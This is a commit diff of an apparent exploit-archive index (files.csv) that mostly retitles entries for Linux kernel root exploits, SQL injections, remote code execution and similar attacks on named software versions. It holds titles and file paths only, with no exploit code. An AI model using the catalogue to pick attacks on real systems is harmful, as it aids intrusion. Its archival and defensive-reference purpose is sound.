Updated 05_19_2014

2014-05-19 04:36:23 +00:00 · 2014-05-19 04:36:23 +00:00 · 51cca24be3
commit 51cca24be3
parent a1eaa87beb
30 changed files with 595 additions and 1468 deletions
--- a/files.csv
+++ b/files.csv
@ -744,7 +744,7 @@ id,file,description,date,author,platform,type,port
 923,platforms/cgi/webapps/923.pl,"The Includer CGI <= 1.0 - Remote Command Execution (2)",2005-04-08,K-C0d3r,cgi,webapps,0
 924,platforms/linux/local/924.c,"sash <= 3.7 - Local Buffer Overflow Exploit",2005-04-08,lammat,linux,local,0
 925,platforms/asp/webapps/925.txt,"ACNews <= 1.0 Admin Authentication Bypass SQL Injection Exploit",2005-04-09,LaMeR,asp,webapps,0
-926,platforms/linux/local/926.c,"Linux Kernel 2.4/2.6 bluez Local Root Privilege Escalation Exploit (update)",2005-10-26,qobaiashi,linux,local,0
+926,platforms/linux/local/926.c,"Linux Kernel 2.4/2.6 - bluez Local Root Privilege Escalation Exploit (Update 3)",2005-10-26,qobaiashi,linux,local,0
 927,platforms/windows/local/927.c,"MS Jet Database (msjet40.dll) DB File Buffer Overflow Exploit",2005-04-11,"Stuart Pearson",windows,local,0
 928,platforms/php/webapps/928.py,"PunBB 1.2.4 (change_email) SQL Injection Exploit",2005-04-11,"Stefan Esser",php,webapps,0
 929,platforms/windows/local/929.py,"MS Jet Database (msjet40.dll) Reverse Shell Exploit",2005-04-12,"Tal Zeltzer",windows,local,0
@ -8077,7 +8077,7 @@ id,file,description,date,author,platform,type,port
 8569,platforms/linux/remote/8569.txt,"Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit",2009-04-29,Arr1val,linux,remote,0
 8570,platforms/linux/remote/8570.txt,"Adobe 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit",2009-04-29,Arr1val,linux,remote,0
 8571,platforms/php/webapps/8571.txt,"Tiger DMS (Auth Bypass) Remote SQL Injection Vulnerability",2009-04-29,"ThE g0bL!N",php,webapps,0
-8572,platforms/linux/local/8572.c,"Linux Kernel 2.6 UDEV < 141 Local Privilege Escalation Exploit",2009-04-30,"Jon Oberheide",linux,local,0
+8572,platforms/linux/local/8572.c,"Linux Kernel 2.6 UDEV < 141 - Local Privilege Escalation Exploit",2009-04-30,"Jon Oberheide",linux,local,0
 8573,platforms/windows/dos/8573.html,"Google Chrome 1.0.154.53 (Null Pointer) Remote Crash Exploit",2009-04-30,"Aditya K Sood",windows,dos,0
 8576,platforms/php/webapps/8576.pl,"Leap CMS 0.1.4 (searchterm) Blind SQL Injection Exploit",2009-04-30,YEnH4ckEr,php,webapps,0
 8577,platforms/php/webapps/8577.txt,"leap cms 0.1.4 (sql/xss/su) Multiple Vulnerabilities",2009-04-30,YEnH4ckEr,php,webapps,0
@ -8176,7 +8176,7 @@ id,file,description,date,author,platform,type,port
 8670,platforms/windows/local/8670.php,"Pinnacle Studio 12 (.hfz) Directory Traversal Vulnerability",2009-05-13,Nine:Situations:Group,windows,local,0
 8671,platforms/php/webapps/8671.pl,"Family Connections CMS <= 1.9 (member) SQL Injection Exploit",2009-05-13,YEnH4ckEr,php,webapps,0
 8672,platforms/php/webapps/8672.php,"MaxCMS 2.0 (m_username) Arbitrary Create Admin Exploit",2009-05-13,Securitylab.ir,php,webapps,0
-8673,platforms/linux/local/8673.c,"Linux Kernel 2.6.x ptrace_attach Local Privilege Escalation Exploit",2009-05-13,s0m3b0dy,linux,local,0
+8673,platforms/linux/local/8673.c,"Linux Kernel 2.6.x - ptrace_attach Local Privilege Escalation Exploit",2009-05-13,s0m3b0dy,linux,local,0
 8674,platforms/php/webapps/8674.txt,"Mlffat 2.1 (Auth Bypass / Cookie) SQL Injection Vulnerability",2009-05-13,Qabandi,php,webapps,0
 8675,platforms/php/webapps/8675.txt,"Ascad Networks 5 Products Insecure Cookie Handling Vulnerability",2009-05-14,G4N0K,php,webapps,0
 8676,platforms/php/webapps/8676.txt,"My Game Script 2.0 (Auth Bypass) SQL Injection Vulnerability",2009-05-14,"ThE g0bL!N",php,webapps,0
@ -8899,8 +8899,8 @@ id,file,description,date,author,platform,type,port
 9432,platforms/hardware/remote/9432.txt,"THOMSON ST585 (user.ini) Arbitrary Download Vulnerability",2009-08-13,"aBo MoHaMeD",hardware,remote,0
 9433,platforms/php/webapps/9433.txt,"Gazelle CMS 1.0 - Remote Arbitrary Shell Upload Vulnerability",2009-08-13,RoMaNcYxHaCkEr,php,webapps,0
 9434,platforms/php/webapps/9434.txt,"tgs cms 0.x (xss/sql/fd) Multiple Vulnerabilities",2009-08-13,[]ViZiOn,php,webapps,0
-9435,platforms/linux/local/9435.txt,"Linux Kernel 2.x sock_sendpage() Local Ring0 Root Exploit",2009-08-14,spender,linux,local,0
+9435,platforms/linux/local/9435.txt,"Linux Kernel 2.x - sock_sendpage() Local Ring0 Root Exploit",2009-08-14,spender,linux,local,0
-9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x sock_sendpage() Local Root Exploit #2",2009-08-14,"Przemyslaw Frasunek",linux,local,0
+9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (2)",2009-08-14,"Przemyslaw Frasunek",linux,local,0
 9437,platforms/php/webapps/9437.txt,"Ignition 1.2 (comment) Remote Code Injection Vulnerability",2009-08-14,IRCRASH,php,webapps,0
 9438,platforms/php/webapps/9438.txt,"PHP Competition System <= 0.84 (competition) SQL Injection Vuln",2009-08-14,Mr.SQL,php,webapps,0
 9440,platforms/php/webapps/9440.txt,"DS CMS 1.0 (nFileId) Remote SQL Injection Vulnerability",2009-08-14,Mr.tro0oqy,php,webapps,0
@ -8942,7 +8942,7 @@ id,file,description,date,author,platform,type,port
 9476,platforms/windows/local/9476.py,"VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit",2009-08-18,mr_me,windows,local,0
 9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android Edition)",2009-08-18,Zinx,android,local,0
 9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 (GET 404) Remote Denial of Service Exploit",2007-06-21,Prili,windows,dos,80
-9479,platforms/linux/local/9479.c,"Linux Kernel 2.4/2.6 - sock_sendpage() ring0 Root Exploit (simple ver)",2009-08-24,"INetCop Security",linux,local,0
+9479,platforms/linux/local/9479.c,"Linux Kernel 2.4/2.6 - sock_sendpage() ring0 Root Exploit (Simple Version)",2009-08-24,"INetCop Security",linux,local,0
 9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class (fix.dll 1.0.0.1) Buffer Overflow PoC",2007-05-09,rgod,windows,dos,0
 9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 (gallery_id) Remote SQL Injection Vulnerability",2009-08-24,Mr.tro0oqy,php,webapps,0
 9482,platforms/php/webapps/9482.txt,"Arcade Trade Script 1.0b (Auth Bypass) Insecure Cookie Handling Vuln",2009-08-24,Mr.tro0oqy,php,webapps,0
@ -9007,7 +9007,7 @@ id,file,description,date,author,platform,type,port
 9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 - (32bit) ip_append_data() ring0 Root Exploit",2009-08-31,"INetCop Security",linux,local,0
 9543,platforms/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - AF_IRDA 29-Byte Stack Disclosure Exploit",2009-08-31,"Jon Oberheide",linux,local,0
 9544,platforms/php/webapps/9544.txt,"Modern Script <= 5.0 (index.php s) SQL Injection Vulnerability",2009-08-31,Red-D3v1L,php,webapps,0
-9545,platforms/linux/local/9545.c,"Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit (ppc)",2009-08-31,"Ramon Valle",linux,local,0
+9545,platforms/linux/local/9545.c,"Linux Kernel 2.4/2.6 - sock_sendpage() Local Root Exploit (PPC Edition)",2009-08-31,"Ramon Valle",linux,local,0
 9546,platforms/windows/dos/9546.pl,"Swift Ultralite 1.032 (.M3U) Local Buffer Overflow PoC",2009-08-31,hack4love,windows,dos,0
 9547,platforms/windows/dos/9547.pl,"SolarWinds TFTP Server <= 9.2.0.111 - Remote DoS Exploit",2009-08-31,"Gaurav Baruah",windows,dos,0
 9548,platforms/windows/local/9548.pl,"Ultimate Player 1.56b (.m3u/upl) Universal Local BOF Exploit (SEH)",2009-08-31,hack4love,windows,local,0
@ -9058,7 +9058,7 @@ id,file,description,date,author,platform,type,port
 9595,platforms/linux/local/9595.c,"HTMLDOC 1.8.27 (html File Handling) Stack Buffer Overflow Exploit",2009-09-09,"Pankaj Kohli",linux,local,0
 9596,platforms/windows/remote/9596.py,"SIDVault 2.0e Windows Universal Buffer Overflow Exploit (SEH)",2009-09-09,SkuLL-HackeR,windows,remote,389
 9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 Remote Denial of Service Exploit",2009-09-09,karak0rsan,windows,dos,0
-9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit [2]",2009-09-09,"Ramon Valle",linux,local,0
+9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4/2.6 - sock_sendpage() Local Root Exploit (2)",2009-09-09,"Ramon Valle",linux,local,0
 9599,platforms/php/webapps/9599.txt,"The Rat CMS Alpha 2 Arbitrary File Upload Vulnerability",2009-09-09,Securitylab.ir,php,webapps,0
 9600,platforms/php/webapps/9600.txt,"OBOphiX <= 2.7.0 (fonctions_racine.php) Remote File Inclusion Vuln",2009-09-09,"EA Ngel",php,webapps,0
 9601,platforms/php/webapps/9601.php,"Joomla Component BF Survey Pro Free SQL Injection Exploit",2009-09-09,jdc,php,webapps,0
@ -9099,7 +9099,7 @@ id,file,description,date,author,platform,type,port
 9638,platforms/windows/remote/9638.txt,"Kolibri+ Webserver 2 Remote Source Code Disclosure Vulnerability",2009-09-11,SkuLL-HackeR,windows,remote,0
 9639,platforms/php/webapps/9639.txt,"Image voting 1.0 (index.php show) SQL Injection Vulnerability",2009-09-11,SkuLL-HackeR,php,webapps,0
 9640,platforms/php/webapps/9640.txt,"gyro 5.0 (sql/xss) Multiple Vulnerabilities",2009-09-11,OoN_Boy,php,webapps,0
-9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit [3]",2009-09-11,"Ramon Valle",linux,local,0
+9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4/2.6 - sock_sendpage() Local Root Exploit (3)",2009-09-11,"Ramon Valle",linux,local,0
 9642,platforms/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-length Tunnel-Password DoS Exploit",2009-09-11,"Matthew Gillespie",multiple,dos,1812
 9643,platforms/windows/remote/9643.txt,"kolibri+ webserver 2 - Directory Traversal vulnerability",2009-09-11,"Usman Saeed",windows,remote,0
 9644,platforms/windows/remote/9644.py,"Kolibri+ Webserver 2 (GET Request) Remote SEH Overwrite Exploit",2009-09-11,blake,windows,remote,80
@ -9231,7 +9231,7 @@ id,file,description,date,author,platform,type,port
 9839,platforms/php/webapps/9839.txt,"Achievo 1.3.4 - Remote File Inclusion",2009-09-22,M3NW5,php,webapps,0
 9840,platforms/php/webapps/9840.txt,"Joomla GroupJive 1.8 B4 Remote File Inclusion",2009-09-22,M3NW5,php,webapps,0
 9841,platforms/asp/webapps/9841.txt,"BPHolidayLettings 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0
-9842,platforms/php/local/9842.txt,"PHP 5.3.0 pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0
+9842,platforms/php/local/9842.txt,"PHP 5.3.0 - pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0
 9843,platforms/multiple/remote/9843.txt,"Blender 2.34, 2.35a, 2.4, 2.49b .blend File Command Injection",2009-11-05,"Core Security",multiple,remote,0
 9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 - Pipe.c Privelege Escalation",2009-11-05,"Matthew Bergin",linux,local,0
 9845,platforms/osx/local/9845.c,"OSX 10.5.6-10.5.7 ptrace mutex DoS",2009-11-05,prdelka,osx,local,0
@ -9291,7 +9291,6 @@ id,file,description,date,author,platform,type,port
 9907,platforms/cgi/webapps/9907.rb,"The Matt Wright guestbook.pl <= 2.3.1 - Server Side Include Vulnerability",1999-11-05,patrick,cgi,webapps,0
 9908,platforms/php/webapps/9908.rb,"BASE <= 1.2.4 base_qry_common.php Remote File Inclusion",2008-06-14,MC,php,webapps,0
 9909,platforms/cgi/webapps/9909.rb,"AWStats 6.4-6.5 - AllowToUpdateStatsFromBrowser Command Injection",2006-05-04,patrick,cgi,webapps,0
 9910,platforms/php/webapps/9910.rb,"Dogfood CRM 2.0.10 spell.php Command Injection",2009-03-03,LSO,php,webapps,0
 9911,platforms/php/webapps/9911.rb,"Cacti 0.8.6-d graph_view.php Command Injection",2005-01-15,"David Maciejak",php,webapps,0
 9912,platforms/cgi/webapps/9912.rb,"AWStats 6.2-6.1 - configdir Command Injection",2005-01-15,"Matteo Cantoni",cgi,webapps,0
 9913,platforms/multiple/remote/9913.rb,"ClamAV Milter <= 0.92.2 - Blackhole-Mode (sendmail) Code Execution",2007-08-24,patrick,multiple,remote,25
@ -9306,7 +9305,7 @@ id,file,description,date,author,platform,type,port
 9923,platforms/solaris/remote/9923.rb,"Solaris 8 dtspcd - Heap Overflow",2002-06-10,noir,solaris,remote,6112
 9924,platforms/osx/remote/9924.rb,"Samba 2.2.0 - 2.2.8 - trans2open Overflow (OS X)",2003-04-07,"H D Moore",osx,remote,139
 9925,platforms/osx/remote/9925.rb,"Apple Quicktime RTSP 10.4.0 - 10.5.0 Content-Type Overflow (OS X)",2009-10-28,N/A,osx,remote,0
-9926,platforms/php/webapps/9926.rb,"Joomla 1.5.12 tinybrowser Remote File Upload/Execute Vulnerability",2009-07-22,spinbad,php,webapps,0
+9926,platforms/php/webapps/9926.rb,"Joomla 1.5.12 - tinybrowser Remote File Upload/Execute Vulnerability",2009-07-22,spinbad,php,webapps,0
 9927,platforms/osx/remote/9927.rb,"mDNSResponder 10.4.0, 10.4.8 UPnP Location Overflow (OS X)",2009-10-28,N/A,osx,remote,0
 9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server <= 5.3.2 - USER Overflow (OS X)",2004-07-13,ddz,osx,remote,21
 9929,platforms/osx/remote/9929.rb,"Mail.App 10.5.0 - Image Attachment Command Execution (OS X)",2006-03-01,"H D Moore",osx,remote,25
@ -9338,8 +9337,6 @@ id,file,description,date,author,platform,type,port
 9956,platforms/hardware/dos/9956.txt,"Palm Pre WebOS 1.1 DoS",2009-10-14,"Townsend Harris",hardware,dos,0
 9957,platforms/windows/remote/9957.txt,"Pegasus Mail Client 4.51 PoC BoF",2009-10-23,"Francis Provencher",windows,remote,0
 9958,platforms/jsp/webapps/9958.txt,"Pentaho <= 1.7.0.1062 xss and information disclosure",2009-10-15,antisnatchor,jsp,webapps,0
 9959,platforms/windows/dos/9959.txt,"PGP4Win 1.4.9 PoC",2009-10-23,Dr_IDE,windows,dos,0
 9960,platforms/php/webapps/9960.txt,"PHP 5.3.0 pdflib file disclosure",2009-11-06,"Sina Yazdanmehr",php,webapps,0
 9961,platforms/php/webapps/9961.txt,"phpCMS 2008 file disclosure",2009-10-19,"Securitylab Security Research",php,webapps,0
 9962,platforms/php/webapps/9962.txt,"Piwik <= 1357 2009-08-02 file upload and code execution",2009-10-19,boecke,php,webapps,0
 9963,platforms/asp/webapps/9963.txt,"QuickTeam 2.2 - SQL Injection",2009-10-14,"drunken danish rednecks",asp,webapps,0
@ -9350,7 +9347,6 @@ id,file,description,date,author,platform,type,port
 9969,platforms/multiple/dos/9969.txt,"Snort <= 2.8.5 - IPv6 DoS",2009-10-23,"laurent gaffie",multiple,dos,0
 9970,platforms/windows/local/9970.txt,"South River Technologies WebDrive Service privilege escalation",2009-10-20,"bellick ",windows,local,0
 9971,platforms/windows/local/9971.php,"Spider Solitaire PoC",2009-10-15,SirGod,windows,local,0
 9972,platforms/multiple/remote/9972.c,"SSL MITM Vulnerability",2009-11-09,"Pavel Kankovsky",multiple,remote,0
 9973,platforms/multiple/local/9973.sh,"Sun VirtualBox <= 3.0.6 - Privilege Escalation",2009-10-17,prdelka,multiple,local,0
 9974,platforms/windows/local/9974.pl,"AIMP2 Audio Converter Playlist (SEH)",2009-11-16,corelanc0d3r,windows,local,0
 9975,platforms/hardware/webapps/9975.txt,"Alteon OS BBI (Nortell) - Multiple Vulnerabilities XSS and CSRF",2009-11-16,"Alexey Sintsov",hardware,webapps,80
@ -9362,8 +9358,7 @@ id,file,description,date,author,platform,type,port
 9984,platforms/windows/local/9984.py,"xp-AntiSpy 3.9.7-4 xpas file BoF",2009-10-26,Dr_IDE,windows,local,0
 9985,platforms/multiple/local/9985.txt,"Xpdf 3.01 heap overflow and null pointer dereference",2009-10-17,"Adam Zabrocki",multiple,local,0
 9987,platforms/multiple/remote/9987.txt,"ZoIPer Call-Info DoS",2009-10-14,"Tomer Bitton",multiple,remote,5060
-9988,platforms/windows/local/9988.txt,"Adobe Photoshop Elements Active File Monitor Service Local Privilege Escalation",2009-10-29,"bellick ",windows,local,0
+9988,platforms/windows/local/9988.txt,"Adobe Photoshop Elements - Active File Monitor Service Local Privilege Escalation",2009-10-29,"bellick ",windows,local,0
 9989,platforms/windows/local/9989.txt,"Adobe Photoshop Elements Active File Monitor Service Local Privilege Escalation Vulnerability",2009-11-11,"bellick ",windows,local,0
 9990,platforms/multiple/local/9990.txt,"Adobe Reader and Acrobat U3D File Invalid Array Index Remote Vulnerability",2009-11-09,"Felipe Andres Manzano",multiple,local,0
 9991,platforms/windows/local/9991.txt,"AlleyCode 2.21 SEH Overflow PoC",2009-10-05,"Rafael Sousa",windows,local,0
 9992,platforms/windows/remote/9992.txt,"AOL 9.1 SuperBuddy ActiveX Control remote code execution",2009-10-01,Trotzkista,windows,remote,0
@ -9413,7 +9408,7 @@ id,file,description,date,author,platform,type,port
 10036,platforms/solaris/remote/10036.rb,"System V Derived /bin/login Extraneous Arguments Buffer Overflow (modem based)",2001-12-12,I)ruid,solaris,remote,0
 10037,platforms/cgi/webapps/10037.rb,"Mercantec SoftCart 4.00b - CGI Overflow",2004-08-19,skape,cgi,webapps,0
 10038,platforms/linux/local/10038.txt,"proc File Descriptors Directory Permissions bypass",2009-10-23,"Pavel Machek",linux,local,0
-10039,platforms/windows/local/10039.txt,"GPG4Win GNU Privacy Assistant PoC",2009-10-23,Dr_IDE,windows,local,0
+10039,platforms/windows/local/10039.txt,"GPG4Win GNU - Privacy Assistant PoC",2009-10-23,Dr_IDE,windows,local,0
 10042,platforms/php/webapps/10042.txt,"Achievo <= 1.3.4 - SQL Injection",2009-10-14,"Ryan Dewhurst",php,webapps,0
 10043,platforms/php/webapps/10043.txt,"redcat media SQL Injection",2009-10-02,s4va,php,webapps,0
 10044,platforms/unix/local/10044.pl,"ProFTPd 1.3.0 mod_ctrls Local Stack Overflow (opensuse)",2009-10-12,"Michael Domberg",unix,local,0
@ -9440,7 +9435,7 @@ id,file,description,date,author,platform,type,port
 10069,platforms/php/webapps/10069.php,"Empire CMS 47 SQL Injection",2009-10-05,"Securitylab Security Research",php,webapps,0
 10070,platforms/windows/remote/10070.php,"IBM Informix Client SDK 3.0 nfx file integer overflow exploit",2009-10-05,bruiser,windows,remote,0
 10071,platforms/multiple/remote/10071.txt,"Mozilla NSS NULL Character CA SSL Certificate Validation Security Bypass Vulnerability",2009-11-10,"Dan Kaminsky",multiple,remote,0
-10072,platforms/multiple/local/10072.c,"Multiple Vendor TLS Protocol Session Renegotiation Security Vulnerability",2009-11-12,"Marsh Ray",multiple,local,0
+10072,platforms/multiple/local/10072.c,"Multiple Vendor - TLS Protocol Session Renegotiation Security Vulnerability",2009-11-12,"Marsh Ray",multiple,local,0
 10073,platforms/windows/remote/10073.py,"XM Easy Personal FTP 5.8 DoS",2009-10-02,PLATEN,windows,remote,21
 10074,platforms/novell/webapps/10074.txt,"Novell eDirectory 8.8 SP5 'dconserv.dlm' Cross-Site Scripting",2009-10-01,"Francis Provencher",novell,webapps,8030
 10075,platforms/novell/webapps/10075.txt,"Novell Edirectory 8.8 SP5 XSS",2009-09-23,"Francis Provencher",novell,webapps,8030
@ -12471,9 +12466,8 @@ id,file,description,date,author,platform,type,port
 14226,platforms/php/webapps/14226.txt,"Bs Home_Classifieds Script SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0
 14227,platforms/php/webapps/14227.txt,"Bs Events_Locator Script SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0
 14228,platforms/php/webapps/14228.txt,"Bs General_Classifieds Script SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0
-14229,platforms/php/webapps/14229.txt,"Bs Auto_Classifieds Script(articlesdetails.php) SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0
+14229,platforms/php/webapps/14229.txt,"Bs Auto_Classifieds Script - (articlesdetails.php) SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0
 14230,platforms/php/webapps/14230.txt,"Bs Business_Directory Script SQL Injection/Auth Bypass Vulnerability",2010-07-05,Sid3^effects,php,webapps,0
 14231,platforms/php/webapps/14231.txt,"Bs Auto_Classifieds Script(articlesdetails.php) SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0
 14232,platforms/php/webapps/14232.txt,"Joomla JPodium Component (com_jpodium) SQL Injection Vulnerability",2010-07-05,RoAd_KiLlEr,php,webapps,0
 14233,platforms/php/webapps/14233.txt,"Bs Auction Script SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0
 14234,platforms/linux/shellcode/14234.c,"125 bind port to 6778 XOR encoded polymorphic linux shellcode .",2010-07-05,gunslinger_,linux,shellcode,0
@ -13071,7 +13065,7 @@ id,file,description,date,author,platform,type,port
 15018,platforms/asp/webapps/15018.txt,"moaub #16 - mojoportal Multiple Vulnerabilities",2010-09-16,Abysssec,asp,webapps,0
 15019,platforms/windows/dos/15019.txt,"MOAUB #16 - Microsoft Excel HFPicture Record Parsing Remote Code Execution Vulnerability",2010-09-16,Abysssec,windows,dos,0
 15022,platforms/windows/local/15022.py,"Honestech VHS to DVD <= 3.0.30 Deluxe Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local,0
-15023,platforms/linux/local/15023.c,"x86_64 Linux Kernel ia32syscall Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0
+15023,platforms/linux/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 - x86_64 ia32syscall Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0
 15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27+ x86_64 compat exploit",2010-09-16,Ac1dB1tCh3z,linux,local,0
 15026,platforms/windows/local/15026.py,"BACnet OPC Client Buffer Overflow Exploit",2010-09-16,"Jeremy Brown",windows,local,0
 15027,platforms/windows/dos/15027.py,"MOAUB #17 - Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution",2010-09-17,Abysssec,windows,dos,0
@ -13261,7 +13255,7 @@ id,file,description,date,author,platform,type,port
 15281,platforms/php/webapps/15281.html,"Event Ticket Portal Script Admin Password Change - CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0
 15283,platforms/windows/dos/15283.txt,"Hanso Converter <= 1.4.0 .ogg Denial of Service Vulnerability",2010-10-19,anT!-Tr0J4n,windows,dos,0
 15284,platforms/php/webapps/15284.txt,"phpCheckZ 1.1.0 - Blind SQL Injection Vulnerability",2010-10-19,"Salvatore Fresta",php,webapps,0
-15285,platforms/linux/local/15285.c,"Linux RDS Protocol Local Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0
+15285,platforms/linux/local/15285.c,"Linux Kernel <= 2.6.36-rc8 - RDS Protocol Local Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0
 15287,platforms/windows/local/15287.py,"Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit",2010-10-19,Mighty-D,windows,local,0
 15288,platforms/windows/remote/15288.txt,"Oracle JRE - java.net.URLConnection class – Same-of-Origin (SOP) Policy Bypass",2010-10-20,"Roberto Suggi Liverani",windows,remote,0
 15290,platforms/jsp/webapps/15290.txt,"Oracle Sun Java System Web Server - HTTP Response Splitting",2010-10-20,"Roberto Suggi Liverani",jsp,webapps,0
@ -13390,7 +13384,7 @@ id,file,description,date,author,platform,type,port
 15437,platforms/windows/remote/15437.txt,"Quick Tftp Server Pro 2.1 - Remote Directory Traversal Vulnerability",2010-11-05,"Yakir Wizman",windows,remote,0
 15438,platforms/windows/remote/15438.txt,"AT-TFTP Server 1.8 - Remote Directory Traversal Vulnerability",2010-11-06,"Yakir Wizman",windows,remote,0
 15439,platforms/php/webapps/15439.txt,"Joomla Component (com_connect) Local File Inclusion Vulnerability",2010-11-06,"Th3 RDX",php,webapps,0
-15440,platforms/php/webapps/15440.txt,"Joomla Component (com_dcnews) Local File Inclusion Vulnerability",2010-11-06,"Th3 RDX",php,webapps,0
+15440,platforms/php/webapps/15440.txt,"Joomla DCNews Component com_dcnews - Local File Inclusion Vulnerability",2010-11-06,"Th3 RDX",php,webapps,0
 15441,platforms/php/webapps/15441.txt,"MassMirror Uploader Remote File Inclusion Vulnerability",2010-11-06,ViciOuS,php,webapps,0
 15442,platforms/php/webapps/15442.txt,"Zeeways Adserver Multiple Vulnerabilities",2010-11-06,Valentin,php,webapps,0
 15443,platforms/php/webapps/15443.txt,"RSform! 1.0.5 (Joomla) Multiple Vulnerabilities",2010-11-06,jdc,php,webapps,0
@ -13410,7 +13404,6 @@ id,file,description,date,author,platform,type,port
 15459,platforms/php/webapps/15459.txt,"Seo Panel 2.1.0 - Critical File Disclosure",2010-11-08,MaXe,php,webapps,0
 15460,platforms/php/webapps/15460.txt,"Joomla Component ProDesk 1.5 - Local File Inclusion Vulnerability",2010-11-08,d3v1l,php,webapps,0
 15461,platforms/windows/local/15461.c,"G Data TotalCare 2011 0day Local Kernel Exploit",2010-11-08,"Nikita Tarakanov",windows,local,0
 15462,platforms/php/webapps/15462.txt,"Joomla DCNews Component com_dcnews LFI Vulnerability",2010-11-08,"Th3 RDX",php,webapps,0
 15463,platforms/linux/dos/15463.txt,"Novell Groupwise Internet Agent IMAP LIST Command Remote Code Execution",2010-11-09,"Francis Provencher",linux,dos,0
 15464,platforms/linux/dos/15464.txt,"Novell Groupwise Internet Agent IMAP LIST LSUB Command Remote Code Execution",2010-11-09,"Francis Provencher",linux,dos,0
 15465,platforms/php/webapps/15465.rb,"Woltlab Burning Board Userlocator 2.5 - SQL injection Exploit",2010-11-09,"Easy Laster",php,webapps,0
@ -13629,7 +13622,7 @@ id,file,description,date,author,platform,type,port
 15721,platforms/php/webapps/15721.txt,"Joomla Component Billy Portfolio 1.1.2 - Blind SQL Injection",2010-12-10,jdc,php,webapps,0
 15722,platforms/multiple/dos/15722.txt,"PHP 5.3.3 NumberFormatter::getSymbol Integer Overflow",2010-12-10,"Maksymilian Arciemowicz",multiple,dos,0
 15723,platforms/freebsd/remote/15723.c,"FreeBSD LiteSpeed Web Server 4.0.17 with PHP - Remote Exploit",2010-12-10,kingcope,freebsd,remote,0
-15725,platforms/linux/remote/15725.pl,"Exim 4.63 Remote Root Exploit",2010-12-11,kingcope,linux,remote,0
+15725,platforms/linux/remote/15725.pl,"Exim 4.63 - Remote Root Exploit",2010-12-11,kingcope,linux,remote,0
 15727,platforms/windows/local/15727.py,"FreeAmp 2.0.7 .m3u Buffer Overflow",2010-12-11,zota,windows,local,0
 15728,platforms/hardware/webapps/15728.txt,"Clear iSpot/Clearspot 2.0.0.0 - CSRF Vulnerabilities",2010-12-12,"Trustwave's SpiderLabs",hardware,webapps,0
 15729,platforms/windows/local/15729.py,"PowerShell XP 3.0.1 - Buffer Overflow 0day",2010-12-12,m_101,windows,local,0
@ -13778,7 +13771,7 @@ id,file,description,date,author,platform,type,port
 15907,platforms/php/webapps/15907.txt,"Nucleus 3.61 - Multiple Remote File Include",2011-01-05,n0n0x,php,webapps,0
 15913,platforms/php/webapps/15913.pl,"PhpGedView <= 4.2.3 - Local File Inclusion Vulnerability",2011-01-05,dun,php,webapps,0
 15915,platforms/php/webapps/15915.py,"Concrete CMS 5.4.1.1 - XSS/Remote Code Execution Exploit",2011-01-05,mr_me,php,webapps,0
-15916,platforms/linux/local/15916.c,"Linux Kernel CAP_SYS_ADMIN to root Exploit",2011-01-05,"Dan Rosenberg",linux,local,0
+15916,platforms/linux/local/15916.c,"Linux Kernel 2.6.34+ - CAP_SYS_ADMIN x86 Local Privilege Escalation Exploit",2011-01-05,"Dan Rosenberg",linux,local,0
 15917,platforms/php/webapps/15917.txt,"Ignition 1.3 (comment.php) Local File Inclusion Vulnerability",2011-01-06,n0n0x,php,webapps,0
 15918,platforms/jsp/webapps/15918.txt,"Openfire 3.6.4 - Multiple CSRF Vulnerabilities",2011-01-06,"Riyaz Ahemed Walikar",jsp,webapps,0
 15919,platforms/windows/local/15919.pl,"Enzip 3.00 Buffer Overflow Exploit",2011-01-06,"C4SS!0 G0M3S",windows,local,0
@ -13798,7 +13791,7 @@ id,file,description,date,author,platform,type,port
 15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit (SEH)",2011-01-08,fdisk,windows,local,0
 15942,platforms/php/webapps/15942.txt,"sahana agasti <= 0.6.5 - Multiple Vulnerabilities",2011-01-08,dun,php,webapps,0
 15943,platforms/php/webapps/15943.txt,"mingle forum (wordpress plugin) <= 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0
